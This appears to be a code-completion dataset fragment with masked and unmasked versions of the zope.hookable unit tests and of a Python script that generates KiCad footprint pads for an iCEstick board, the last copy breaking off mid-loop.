"step-1": "<mask token>\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n <mask token>\n <mask token>\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n <mask token>\n <mask token>\n <mask token>\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n <mask token>\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass 
HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PyHookableMixin:\n <mask token>\n\n\nclass HookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n if hookable is _py_hookable:\n raise unittest.SkipTest('Hookable and PyHookable are the same')\n return hookable(*args, **kw)\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n\n def test_implementation_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.implementation\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = 
self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef return_bar():\n return 'BAR'\n\n\n<mask token>\n\n\nclass PyHookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n return _py_hookable(*args, **kw)\n\n\nclass HookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n if hookable is _py_hookable:\n raise unittest.SkipTest('Hookable and PyHookable are the same')\n return hookable(*args, **kw)\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n\n def test_implementation_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.implementation\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class 
C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-5": "##############################################################################\n#\n# Copyright (c) 2003 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Test the hookable support Extension\n\"\"\"\nimport unittest\n\n\ndef return_foo():\n return 'FOO'\n\n\ndef return_bar():\n return 'BAR'\n\n\ndef not_called():\n raise AssertionError(\"This should not be called\")\n\n\nclass PyHookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n return _py_hookable(*args, **kw)\n\n\nclass HookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n if hookable is _py_hookable:\n raise unittest.SkipTest(\"Hookable and PyHookable are the same\")\n return hookable(*args, **kw) # pragma: no cover\n\n\nclass PyHookableTests(PyHookableMixin,\n unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n\n def test_implementation_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.implementation\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n class C:\n pass\n\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin,\n unittest.TestCase):\n # Make sphinx docs for hooked objects work.\n # 
https://github.com/zopefoundation/zope.hookable/issues/6\n # We need to proxy __doc__ to the original,\n # and synthesize an empty __bases__ and a __dict__ attribute\n # if they're not present.\n\n def _check_preserves_doc(self, docs):\n self.assertEqual(\"I have some docs\", docs.__doc__)\n\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n class Docs:\n \"\"\"I have some docs\"\"\"\n\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n class C:\n pass\n\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n # Specifically for the C implementation, which has to deal with this\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n # Specifically for the C implementation, which has to deal with this\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n # Specifically for the C implementation, which has to deal with this\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\ndef test_suite():\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n",
"step-ids": [
20,
24,
28,
30,
35
]
}
|
[
20,
24,
28,
30,
35
] |
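In plain use, the behaviour those tests pin down looks like this: a function is wrapped in hookable() once, and other code can later swap or restore the implementation without callers noticing. A sketch using only the API exercised above:

from zope.hookable import hookable

def _default_greeting():
    return 'hello'

greeting = hookable(_default_greeting)

assert greeting() == 'hello'
previous = greeting.sethook(lambda: 'hi')   # returns the implementation it replaced
assert previous is _default_greeting
assert greeting() == 'hi'
greeting.reset()                            # restore the original
assert greeting() == 'hello'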
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if exists(filename):
f = open(filename)
footprint = f.read()
f.close()
headerEndIndex = footprint.find('(pad ')
header = footprint[:headerEndIndex]
lastPadIndex = headerEndIndex
while footprint.find('(pad ', lastPadIndex) > -1:
lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5
footerStartIndex = footprint.find('))', lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find('TE-Connectivity') < 0:
header = """(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ')'
<|reserved_special_token_0|>
y -= 21.81
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j1[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
<|reserved_special_token_0|>
for i in range(6):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated
=True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j2 += [newPad]
y -= 2.54
x -= 2.54
<|reserved_special_token_0|>
for i in range(6):
newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated
=True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),
drill=drillDiameter)
pads_j2 += [newPad]
y -= 2.54
<|reserved_special_token_0|>
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j3[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
    pads_j3 += [newPad]
x -= 2.54
<|reserved_special_token_0|>
for pad in pads:
newFootprint += str(pad) + '\n'
newFootprint += footer.strip()
print(newFootprint)
<|reserved_special_token_0|>
f.write(newFootprint)
f.close()
<|reserved_special_token_1|>
x = 0.0
y = 0.0
drillDiameter = 1.0
padWidth = 1.6
<|reserved_special_token_0|>
filename = 'iCEstick.kicad_mod'
header = ''
footer = ''
if exists(filename):
f = open(filename)
footprint = f.read()
f.close()
headerEndIndex = footprint.find('(pad ')
header = footprint[:headerEndIndex]
lastPadIndex = headerEndIndex
while footprint.find('(pad ', lastPadIndex) > -1:
lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5
footerStartIndex = footprint.find('))', lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find('TE-Connectivity') < 0:
header = """(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ')'
designators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]
designators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',
'88', '90', '91', 'GND', '3V3']]
designators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']
pads_j1 = []
oldX = x
oldY = y
y -= 21.81
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j1[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
pads_j2 = []
x = oldX - 5.8
newY = oldY - 21.81 + 4.49 + 5 * 2.54
y = newY
for i in range(6):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated
=True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j2 += [newPad]
y -= 2.54
x -= 2.54
y = newY
for i in range(6):
newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated
=True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),
drill=drillDiameter)
pads_j2 += [newPad]
y -= 2.54
pads_j3 = []
x = oldX
y = oldY
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j3[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
    pads_j3 += [newPad]
x -= 2.54
pads = pads_j1 + pads_j2 + pads_j3
newFootprint = header
for pad in pads:
newFootprint += str(pad) + '\n'
newFootprint += footer.strip()
print(newFootprint)
f = open(filename, 'w')
f.write(newFootprint)
f.close()
<|reserved_special_token_1|>
x = 0.0
y = 0.0
drillDiameter = 1.0
padWidth = 1.6
from os.path import exists
from pad import *
filename = 'iCEstick.kicad_mod'
header = ''
footer = ''
if exists(filename):
f = open(filename)
footprint = f.read()
f.close()
headerEndIndex = footprint.find('(pad ')
header = footprint[:headerEndIndex]
lastPadIndex = headerEndIndex
while footprint.find('(pad ', lastPadIndex) > -1:
lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5
footerStartIndex = footprint.find('))', lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find('TE-Connectivity') < 0:
header = """(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ')'
designators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]
designators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',
'88', '90', '91', 'GND', '3V3']]
designators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']
pads_j1 = []
oldX = x
oldY = y
y -= 21.81
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j1[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
pads_j2 = []
x = oldX - 5.8
newY = oldY - 21.81 + 4.49 + 5 * 2.54
y = newY
for i in range(6):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated
=True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j2 += [newPad]
y -= 2.54
x -= 2.54
y = newY
for i in range(6):
newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated
=True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),
drill=drillDiameter)
pads_j2 += [newPad]
y -= 2.54
pads_j3 = []
x = oldX
y = oldY
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j3[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
    pads_j3 += [newPad]
x -= 2.54
pads = pads_j1 + pads_j2 + pads_j3
newFootprint = header
for pad in pads:
newFootprint += str(pad) + '\n'
newFootprint += footer.strip()
print(newFootprint)
f = open(filename, 'w')
f.write(newFootprint)
f.close()
<|reserved_special_token_1|>
#!/usr/bin/python
# Point of origin (connector J3, pad 1, net 3V3)
x = 0.0
y = 0.0
drillDiameter = 1.0
padWidth = 1.6
from os.path import exists
from pad import *
filename="iCEstick.kicad_mod"
header = ""
footer = ""
if exists(filename):
# Read existing footprint
f = open(filename)
footprint = f.read()
f.close()
# Find the end of the header
headerEndIndex = footprint.find("(pad ")
header = footprint[:headerEndIndex]
# Find the end of the pads list
lastPadIndex = headerEndIndex
while (footprint.find("(pad ", lastPadIndex) > -1):
lastPadIndex = footprint.find("(pad ", lastPadIndex) + 5
footerStartIndex = footprint.find("))", lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find("TE-Connectivity") < 0:
header = \
"""(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ")"
#
# Generate pads according to schematic drawing
#
designators_j1 = ["3V3", "GND"] + [str(n) for n in range(112,120)]
designators_j2 = [ \
[str(n) for n in range(78,82)] + ["GND", "3V3"], \
["87", "88", "90", "91", "GND", "3V3"] \
]
designators_j3 = ["3V3", "GND", "62", "61", "60", "56", "48", "47", "45", "44"]
#
# J1 connector pad list
#
pads_j1 = []
oldX = x
oldY = y
y -= 21.81
for i in range(10):
# The first pad is a rectangle, the remaining ones are circular
if (i == 0):
shape = Shape.RECT
else:
shape = Shape.CIRCLE
# Create pad object
newPad = Pad(
designator = designators_j1[i],
through_hole = True,
plated = True,
shape = shape,
at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
pads_j1 += [newPad]
x -= 2.54
#
# J2 connector pad list
#
pads_j2 = []
x = oldX - 5.80
newY = oldY - 21.81 + 4.49 + 5*2.54
y = newY
for i in range(6):
# The first pad is a rectangle, the remaining ones are circular
if (i == 0):
shape = Shape.RECT
else:
shape = Shape.CIRCLE
# Create pad object
newPad = Pad(
designator = designators_j2[0][i],
through_hole = True,
plated = True,
shape = shape,
